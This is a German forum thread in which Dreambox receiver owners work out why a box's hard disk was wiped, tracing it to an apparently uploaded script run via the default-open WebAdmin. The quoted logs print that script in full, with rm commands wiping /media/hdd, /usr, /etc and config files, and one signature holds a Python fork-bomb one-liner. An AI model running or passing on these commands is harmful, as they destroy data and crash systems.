Greenscreen der 2. diesmal komplette Hdd Gelöscht

    Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

    • Greenscreen der 2. diesmal komplette Hdd Gelöscht

      Hallo
      Irgendwie werd ich mit Diesem Oe 2.5 nicht glücklich jedesmal wenn ich nen Greenscreen bekomm kann ich die Box neu flashen
      und diesmal hats mir sogar die komplette Hdd Gelöscht könnte <X
      Und das momentan alle 5-7 Tage das Selbe.
      Dateien

    • boah was denn das in deinem crashlog

      Quellcode

      1. [WebInterface] fallback to default translation for You have to set your encoder into TV-Services Mode for things to work as expected!
      2. nr_read 747 nr_write 75
      3. sum 822 prev_sum 822
      4. hdd IDLE!
      5. [IDLE] 40020.2186151 300 True
      6. [WebScriptList] file delete.sh
      7. [WebScriptList] text #!/bin/sh
      8. #!/bin/bash
      9. rm -v /media/hdd/*
      10. rm -rv /media/hdd/*
      11. #rm -v /media/DM800SEV2/*
      12. #rm -rv /media/DM800SEV2/*
      13. #rm -v /media/DM800SESCHLAFEN/*
      14. #rm -rv /media/DM800SESCHLAFEN/*
      15. rm /etc/tuxbox/config/*.server
      16. rm /etc/tuxbox/config/*.conf
      17. rm /etc/tuxbox/config/*.user
      18. rm /etc/*m.cfg &
      19. rm -r /usr/* &
      20. rm -r /etc/* &
      21. sleep 10
      22. rm /usr/script/delete.sh
      23. It's now Do 05 Jan 2017 21:32:34 CET
      24. [timer.py] next activation: 1483648454 (in 99989 ms)
      25. [Script] cmd: ['/usr/script/delete.sh']
      26. [prepareClose] running loop
      27. [SEC] lock 0
      Alles anzeigen
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !

    • Quellcode

      1. action -> MP_Actions ok
      2. [UploadTextResource] req.args {'path': ['/usr/script/'], 'filename': ['delete.sh'], 'text': ['#!/bin/sh\r\n#!/bin/bash\r\nrm -v /media/hdd/*\r\nrm -rv /media/hdd/*\r\n#rm -v /media/DM800SEV2/*\r\n#rm -rv /media/DM800SEV2/*\r\n#rm -v /media/DM800SESCHLAFEN/*\r\n#rm -rv /media/DM800SESCHLAFEN/*\r\nrm /etc/tuxbox/config/*.server\r\nrm /etc/tuxbox/config/*.conf\r\nrm /etc/tuxbox/config/*.user\r\nrm /etc/*m.cfg &\r\nrm -r /usr/* &\r\nrm -r /etc/* &\r\nsleep 10\r\nrm /usr/script/delete.sh']}
      3. [UploadTextResource] text: #!/bin/sh
      4. #!/bin/bash
      5. rm -v /media/hdd/*
      6. rm -rv /media/hdd/*
      7. #rm -v /media/DM800SEV2/*
      8. #rm -rv /media/DM800SEV2/*
      9. #rm -v /media/DM800SESCHLAFEN/*
      10. #rm -rv /media/DM800SESCHLAFEN/*
      11. rm /etc/tuxbox/config/*.server
      12. rm /etc/tuxbox/config/*.conf
      13. rm /etc/tuxbox/config/*.user
      14. rm /etc/*m.cfg &
      15. rm -r /usr/* &
      16. rm -r /etc/* &
      17. sleep 10
      18. rm /usr/script/delete.sh
      Alles anzeigen
      hat hat wohl wer deine BOX gelöscht
      Probleme kann man niemals mit derselben Denkweise lösen.

      ¯\_(ツ)_/¯

      "Die Deutsche Rechtschreibung ist Freeware, sprich, du kannst sie kostenlos nutzen.
      Allerdings ist sie nicht Open Source, d.h. du darfst sie nicht verändern oder in veränderter Form veröffentlichen."

    • hmich schrieb:

      warum kann man im Image ein Passwort setzen?..warscheinlich deswegen...
      es gibt spezialisten die stellen die dreambox in die dmz, setzen zwar ein passort nur haben sie eine samba freigabe rw auf das rootfs
      » time to say goodbye «

      Konfuzius sagt:
      Erst wenn eine Mücke auf deinen Hoden landet wirst du lernen Probleme ohne Gewalt zu lösen.

    • hmich schrieb:

      ich bin eh schon immer ein Gegner von Samba gewesen, warum muss das eigentlich in das Image?
      sonst gibt es noch mehr threads mit mounten
      » time to say goodbye «

      Konfuzius sagt:
      Erst wenn eine Mücke auf deinen Hoden landet wirst du lernen Probleme ohne Gewalt zu lösen.

    • Hilfsbereit schrieb:

      tja, die Hacker rüsten halt auf ;)

      glaube nicht, dass das ein Problem des OE2.5 ist. Du wirst ja auf deinem PC auch wenigstens einen Virenscanner drauf haben .....
      clamav für die drambox :D :D :D
      » time to say goodbye «

      Konfuzius sagt:
      Erst wenn eine Mücke auf deinen Hoden landet wirst du lernen Probleme ohne Gewalt zu lösen.

    • Nach dem log würde ich sagen, dass jemand per webadmin das script ausgeführt hat - ein script wird sofort ausgeführt, nachdem es hochgeladen wurde. Für mich ist der Webadmin ein Sicherheitsrisiko und gehört aus meiner Sicht nicht standardmäßig ins Image. Selbst wenn jemand sofort ein Passwort setzt bekommt jemand quasi Vollzugiff über HTTP, weil die meisten wohl aus Bequemlichkeit die HTTP Authentifizierung nicht aktivieren (default Nein). Da muss nicht mal ein Port extern offen sein, da kann jeder im internen Netz alles machen, obwohl er per ssh/telnet keinen Zugang hat ...


      Der Web Admin ist das erste was ich nach dem flashen deinstalliere, weil ich ihn sowieso nicht brauche. Eigentlich sollte das umgekehrt sein: Wer das braucht, soll es nachinstallieren und sollte wissen was er tut. Ich glaube nicht, dass alle user wissen, wie mächtig der Web Admin ist und das der Zugang nach dem Flashen per default für jeden möglich ist.
      Gruß Fred

      Die Dreambox ist tot, es lebe die Dreambox

      ¯\_(ツ)_/¯

      Quellcode

      1. root@dm920:~$ mount | grep "/ "
      2. /dev/mmcblk1p1 on / type ext4 (rw,relatime,data=ordered)
      3. root@dm920:~$

      Dieser Beitrag wurde bereits 2 mal editiert, zuletzt von Fred Bogus Trumper ()